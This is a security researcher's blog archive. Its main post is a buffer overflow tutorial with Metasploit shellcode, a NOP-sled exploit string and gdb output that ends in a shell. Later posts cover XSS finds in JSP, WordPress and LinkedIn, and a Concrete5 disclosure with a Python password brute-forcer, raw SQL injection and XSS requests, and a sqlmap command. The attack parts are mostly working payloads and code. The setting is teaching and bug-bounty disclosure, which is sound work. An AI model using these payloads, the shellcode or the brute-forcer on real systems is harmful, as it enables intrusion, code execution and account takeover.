Tuesday 10 December 2013

[EN] Buffer overflows - my short review

Document was created to consolidate knowledge about buffer overflows.

1. Why exploit is not working on the modern system(s)?

Because of development of new programs, systems and protections attackers
are working on new techniques to bypass those protections.

2. What to do to check what security settings we have at our system?

In the machine like mine (Debian 7, with `uname`:
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux)

we can do it in a few ways, for example:

a) ldd - print shared library dependencies


Typing:
$ ldd <ourprog>
few times, we can check if addresses in memory have changed. It will help
us to specify if in our system we have enabled so called ASLR(1).

b) we can also check if ASLR is enabled by default by reading the value
from 'randomize_va_space' file:
 

$ cat /proc/sys/kernel/randomize_va_space

Any other value than 0 tells us that addresses will be changed.

In case of learning process it's good to change this (default) value
to zero. We can do it by:
# echo "0" > /proc/sys/kernel/randomize_va_space

c) Tobias Klein(2) wrote a nice tool to check what security setting
was added to our binary. This tool you can find at his page(2).

3. Where can we start?

We can start everywhere where we will find a computer. ;)

Better question is: what we should know to start understanding,
not only rewriting examples from books and articles.

So, a short list:
-- programming in C (you not need to be 'ace', you need only few
chapters from any book about C where you will find information about:
arrays, pointers, receiving and displaying characters and probably few
things about memory management).

-- programming in Python - because many tools (for example fuzzers) can
be created really fast.(3)

-- ASM - the magic and the scare, super difficult and super easy at the
same time. In my case the best idea to learn this, was a paper and pen (4)
and writting names of registers (for example Intel's), what they means and
for what we can use them. Nice idea to memorization.

Next step is getting used to all super-magic shortcuts like add, movl, call
and so on. (You can write it down too. The more you practice, the better.)

-- if it's still not enough for you, good start should be also:
$ man gcc
(try here (5)) and check what (changes and) options are available during
the compilation (what will be usefull to understand what protections
you can disable at the compilation stage.)

4. Example

We will need some example vulnerable to attack.

At my blog I decide to write about few cases how to exploit RCE
in webapps (6) so in a similar way we will try to find a vulnerable
example in C language.

https://github.com/search?q=extension%3AC+strcpy%28argv[1]%29&ref=cmdform

Searching in this way we will find few examples of 'lessons' described
by someone else. We will use this examples. First answer for our search
query is a program called 'vulnerable.c':

---<code>---
void main(int argc, char *argv[])
{
  char buffer[512];

  if (argc > 1)
    strcpy(buffer,argv[1]);
}
---<code>---

Making sure, that "randomize_va_space" file has value '0', we will compile(7)
our vulnerable program:

* -ggdb - "Produce debugging information for use by GDB"
* -g     - "Produce debugging information in the operating system's native format"
* -fno-stack-protector - disables the protection

k@debian:~/src/bugz$ gcc vulnerable.c -o vulnerable -ggdb -g -fno-stack-protector

We will fill the buffer of our program, to overflow it.

$ gdb -q ./vulnerable
(gdb) r `perl -e 'print "A"x524,"B"x4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "A"x524,"B"x4'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

Ok. Program crashed.

No we will get a shellcode (from Metasploit from BackTrack5(8)).
To get on, we will use 'msfpayload':

root@bt:/pentest/exploits/framework3# msfpayload linux/x86/exec CMD=dash R |
msfencode -a x86 -e x86/alpha_mixed -b "\x00\x0a\x0d" -t c
[*] x86/alpha_mixed succeeded with size 142 (iteration=1)

unsigned char buf[] =
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56"
"\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68"
"\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b"
"\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34"
"\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58"
"\x61\x58\x4d\x4f\x70\x41\x41";

Using this command we will have a shellcode ready to use as our buffer value.
To get this working we must remember that we will need to substract from
our 'overflow'-value (524*"A"), length of our shellcode (142 bytes in
this case).

To exploit this vulnerability we will need this kind of situation:
    [    A*382      ] + [ shellcode ]  + [ B*4 ]
   
to set EIP (instruction pointer, holds the program counter, current instruction
address) to our "BBBB" string.

So now in 'gdb' we will use this string:

(gdb) r `perl -e 'print "A"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a
\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42
\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39
\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51
\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53
\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50
\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41","B"x4'`

Our output should look like this:
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp esp
eip            0x42424242       0x42424242
ebp            0x4141704f       0x4141704f
esp            0xbffff540       0xbffff540

Ok. Now we must localize the beginning of our shellcode in memory:

(gdb) x/600wx $esp
(...)

0xbffff880:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff890:     0x41414141      0x41414141      0x41414141      0xc6d9e189
0xbffff8a0:     0x58f471d9      0x49495950      0x49494949      0x49494949
0xbffff8b0:     0x43434343      0x51374343      0x58416a5a      0x30413050
(...)

Ok. Let's check if the answer from gdb is the real one, which we want to
call by our overflow:

(gdb) x/s 0xbffff890
0xbffff890:      'A' <repeats 12 times>"\211, \341\331\306\331q\
364XPYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICZVkV8Z9
CbE6CXVMRCLIZGCXToQcPhEPRHVOPbE9PnMYKSCbIxC5C0GpGpE4QqPsPhGpCgV3
LIXaXMOpAABBBB"

Almost good.

Instead of letter "A" we will use NOP ("no operation") instruction. It
will let us 'slide' to our address (where we want to return). Instead
of mentioned "B" value, let's use the value we've found before:

(gdb) r `perl -e 'print "\x90"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50
\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37
\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32
\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56
\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a
\x47\x43\x58\x54\x6f\x51\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45
\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47
\x70\x45\x34\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58
\x61\x58\x4d\x4f\x70\x41\x41","\x90\xf8\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "\x90"x382,
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49
\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30
\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50
\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36
\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68
\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62
\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50\x68
\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41",
"\x90\xf8\xff\xbf"'`
process 4336 is executing new program: /bin/dash
$ uname -a
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux
$

And that's all. Now we have exploited a buffer overflow vulnerability.

Thanks!



1) ASLR
    http://en.wikipedia.org/wiki/Address_space_layout_randomization
2) Tobias Klein -
    http://www.trapkit.de
3) Python
    https://wiki.python.org/moin/BeginnersGuide
    http://en.wikibooks.org/wiki/Python_Programming
4) ASM
    http://en.wikibooks.org/wiki/X86_Assembly
5) GCC
    http://gcc.gnu.org/releases.html
6) Finding vulnerabilities at github.com
    http://hauntit.blogspot.com/2013/06/en-rce-another-lesson.html
7) GCC Debugging options
    http://gcc.gnu.org/onlinedocs/gcc-4.1.2/gcc/Debugging-Options.html
8) Metasploit
    http://www.metasploit.com
   
   

Tuesday 19 November 2013

[EN] Microsoft's bug bounty - updated

Yesterday was a day full of surprises.

Another nice email, this time from MS ;)




* Update @ 05.12.2013 *
http://technet.microsoft.com/en-us/security/cc308589.aspx

Thanks! ;)


Remember about responsible disclosure!

Cheers,
o/

[EN] LinkedIn Bug Bounty

It was a real pleasure to work with LinkedIn Security Team!

LinkedIn bugbounty


Thanks guys. ;)

Tuesday 29 October 2013

[EN] JSP Code Review - part 1

Durning pentesting of webapps in various companies, often happens that
few pages are written in JSP.

I described here few different cases of testing webapps - by white box and/or black box 
testing - so today I decide, why not do it again for JSP-based pages? ;)

For our purpose, a great example we can find at one of pages with tutorials 
in section called 'HTTP Header Request Example'. Below I will show you
how we can check if this or that (or part of ;)) page is vulnerable to attacks.

(In case you don't know how to prepare your virtual environment for testing 
JSP-based pages, check this site. Here you will find nearly step-by-step list
to install Tomcat with Java at your linux-box. If you will have any troubles
leave me an email or comment below.)

Ok. Let's get back to our JSP tutorial.
Example code will show headers after request to our 'test page'.

---<code>---
<%@ page import="java.io.*,java.util.*" %>
<html>
<head>
<title>HTTP Header Request Example</title>
</head>
<body>
<center>
<h2>HTTP Header Request Example</h2>
<table width="100%" border="1" align="center">
<tr bgcolor="#949494">
<th>Header Name</th><th>Header Value(s)</th>
</tr>
<%
   Enumeration headerNames = request.getHeaderNames();
   while(headerNames.hasMoreElements()) {
      String paramName = (String)headerNames.nextElement();
      out.print("<tr><td>" + paramName + "</td>\n");
      String paramValue = request.getHeader(paramName);
      out.println("<td> " + paramValue + "</td></tr>\n");
   }
%>
</table>
</center>
</body>
</html>

---<code>---

Ok. Let's save this code as 'headers.jsp'.


It's not the problem to test this site by using Burp like it was described
in few mini-arts here but in this case we will do a little 'code review'. ;)


Few short examples was also described here or here. So here we will use 
similar trick. In case we know that if user's input is not (or properly) sanitized
then it's possible to inject code in web.


So now we will search for 'something' that will print out 'text' (string) added 
by user. In our JSP, it will befunction out.print. Let's find out if we can 
grab this string in our source code:

# cat -n header.jsp | grep out.print
    17        out.print("<tr><td>" + paramName + "</td>\n");
    19        out.println("<td> " + paramValue + "</td></tr>\n");
#



Yes, we can. ;)


We can see 2 lines, both with 'some parameter/value names'.
Let's find out what are those:


(...)
      String paramName = (String)headerNames.nextElement();
(...)



It seems to be some 'string', let's check the other 'parameter':


# grep paramValue header.jsp
      String paramValue = request.getHeader(paramName);
      out.println("<td> " + paramValue + "</td></tr>\n");
#



Great. So now we can see that 'paramName' is from request, and it gets
some header value(s) (getHeader() function). And, because its not filtered
in any way before printing out, we can try to inject here some code.


Let's check if we can change one of presented headers, for example,
lets change an user Agent. 


To do that we can use DataTamper or mentioned Burp Proxy (but honestly 
in my opinion for this kind of 'simple checking' - DataTamper will be fine.


Let's catch request to server (our 'header page' in JSP) and next we will 
change value from userAgent to our favourite 'XSS payload':

Tampered header
As a response from this not-filtered input, we can see nice and old XSS alert box ;)
 

XSS in JSP webapp

Good luck with code review!

If you have any questions - as always - leave me an email. ;)

Cheers 
o/ 

Wednesday 9 October 2013

[EN] Testing format strings bugs

Few weeks ago I wrote a short post about where you can find examples
to learn RCE vulnerabilities and how to exploit them.

Today I would like to present you similar story, this time for format string attacks.
Few examples of vulnerable codes you will find here. ;)

If you have any questions feel free to ask, but once again:
I will help you only with legal ideas, so please do not send me an emails
that you want steal someone's database ;) Thanks.

Enjoy!

o/

[EN] Wordpress 3.6.1 XSS

"Houston we've got a problem..." ;)

... in latest (3.6.1) Wordpress :


Same story as before but seems to be not patched anyway:
Enjoy, because 'it can not be used' - right? ;)


* Update @ 17/10/2013 *

Check file 'options-discussion.php' in /wp-admin/ directory, for lines 187-202.
You will find there:
---<code>---
   187  <?php
   188  $ratings = array(
   189          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   190          'G' => __('G &#8212; Suitable for all audiences'),
   191          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   192          'PG' => __('PG &#8212; Possibly offensive, usually for audiences 13 and above'),
   193          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   194          'R' => __('R &#8212; Intended for adult audiences above 17'),
   195          /* translators: Content suitability rating: http://bit.ly/89QxZA */
   196          'X' => __('X &#8212; Even more mature than above')
   197  );
   198  foreach ($ratings as $key => $rating) :
   199          $selected = (get_option('avatar_rating') == $key) ? 'checked="checked"' : '';
   200          echo "\n\t<label><input type='radio' name='avatar_rating' value='" . esc_attr($key) . "' $selected/> $rating</label><br />";
   201  endforeach;
   202  ?>


---<code>---

so because there is no any checking if 'rating' is valid or not, we can put in 'avatar_rating'
parameter any JavaScript/HTML code we want. In this case reflected XSS is possible.

To patch this bug, we need to edit wp-includes/pluggable.php file and change line 1662 like below:
Changed pluggable.php file

Simple change this line and add Wordpress's functions 'esc_html'.
Now it should be ok. ;)

Friday 4 October 2013

[EN] osCommerce 2.3.3.4 Exploited

Hi ;)

Durning few projects sometimes I can find that customers are using osCommerce
at their servers.

I prepare a small (poc) tool to a little bit automate a process of password cracking
and exploiting RCE available in admin panel (again ;) ).

Like I said to next week, this won't be public, sorry.
Anyway if you think that you will need it before (to test your sites or
your customers) then feel free to let me know privately, via email as always.

Have a nice day
o/

Monday 30 September 2013

[EN] XSS at Microsoft page

Hi,

durning bugbounty tests I decide to try at Microsoft's page.

After a while, I found one bug.
Of course there was a nice contact about the whole case, but
after asking about any response - no contact to this day. :)

So... public ;)





Similar story to one, described few minutes ago about linkedin.com.

* Update @ 11/10.2013 *
Finally I've got an answer about this case, and it should be presented at their page.
In case of any news I will publish here the details.


Enjoy and remember to do only legal things ;)

Cheers
o/

[EN] Another XSS at LinkedIn.com

Hi,

durning few tests in few different bugbounty programs,
at 19.09 this year I found another persistent XSS in our nice job portal
www.linkedin.com

Durning mails with IT support I think it is patched now, but
if you wanna try - here you have a short list of steps to reproduce:

1. Log-in to your account
2. Go to contact lists, to 'imported contacts'
3. Edit one contact
4. In a new windows, in edited person, surename is vulnerable
to persistent XSS.

Below screen from sample 'attack':




* Update @ 01.10.2013 * 
'Seems to patchet at production.' ;)


* Update @ 04.10.2013 * 

LinkedIn Team once again surprised me about their answer. :)
This is realy good Team!
Good job guys!

Enjoy and remember, do only legal things ;)

Cheers
o/

Wednesday 25 September 2013

[EN] IPBoard 3.x Updates

Yesterday I saw a new post at IPBoard Community Forum about few
new vulnerabilities and patches.

If you're using mentioned version(s) I would recommend you to update it as soon as you can.
"How to do it" was described at forums page.

Big thanks to guys from IPB Support for a fast response and great job!
Keep going! ;)

Friday 16 August 2013

[EN] Friday... ;)


root@bt:~/src/ntop/ntop-1.1$ ./entop
SIOCGIFADDR error: 1Û¸·ªªª%·UUUSSÍ1Û¸ªªª%UUUSSÍë^1ÀFF
  V
° N
 ó
Í1ÛØ@ÍèÜÿÿÿ/bin/shàìÿ¿àìÿ¿/
errno=19
 ntop v.1.1 MT [i686-pc-linux-gnu] listening on ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P

 Host                     Act   -Rcvd-      Sent       TCP       UDP     ICMP sh-4.1# uid=0(root) gid=0(root) groups=0(root)
          sh-4.1#


(;

Monday 12 August 2013

[EN] Concrete5 6.1.2 Multiple Bugs

From SQL injection via multiple XSS to information gathering...
Enjoy:


Starting from description of bugs available for admin user logged-in I should mention
that there is no anti-bruteforce mechanizm, so if admins password is 'simple',
we can crack it, like it was described below:

Searching admin's password in Concrete5 CMS

Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py


#!/usr/bin/env python
# code after a little update : 14.08 ;)
#
import requests
import sys

username = 'admin'
path = '/index.php/login/do_login/'

print '\n_________________________________________________'
print '>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n'
print 'If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n'

pwdfile = open('passwords.txt','r')
read_pass = pwdfile.readlines()

for test_pass in read_pass:
  url = sys.argv[1]+path

  data = {
        'uName':username,
        'uPassword':test_pass,
        'rcID':'',
        'submit':'Sign+In+%3E',
  }

  get_cookies = requests.post(url)
  conn = requests.post(url, data=data, cookies=get_cookies.cookies)

  print '[ > ] Status code for this request: ', conn.status_code

  lines = conn.content

  if 'Currently' in lines:
    print '[+] Logged in as: [', username, '] with password: [', test_pass,']'



---< code >---

So if we will have an admin password, we can start from...

 1. SQL injection 
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223

-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"

qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"

8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"

11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"

14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"

AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"

'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"

8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"

1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"

<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"


-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"

Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"

170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"

0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"

1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
 

Because "_bf[BLOCK_" parameters are not properly filtered, we can use it to generate sql error, like this:


---< response >---

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">&lt; Back to Home</a></p>
</div>

---< response >---


To reproduce this vulnerability you can use sqlmap tool:

root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"

Example of SQL Injection



2.  DOM-based XSS
---< request >---

POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119

-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain

sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"

');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"

1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"


-----------------------------55721791519552--
---< request >---


---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---

3. sql error to check

---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


resp:

<h1>An unexpected error occurred.</h1>

<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle  from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID)  inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID)  where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">&lt; Back to Home</a></p>
</div>




4. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


6. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


8. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:


Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>

</div>
<div class="ccm-pane-footer">

9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


10. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html


Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134


11. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---


15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94

MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---

16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187

ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---

resp:
       
    <div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
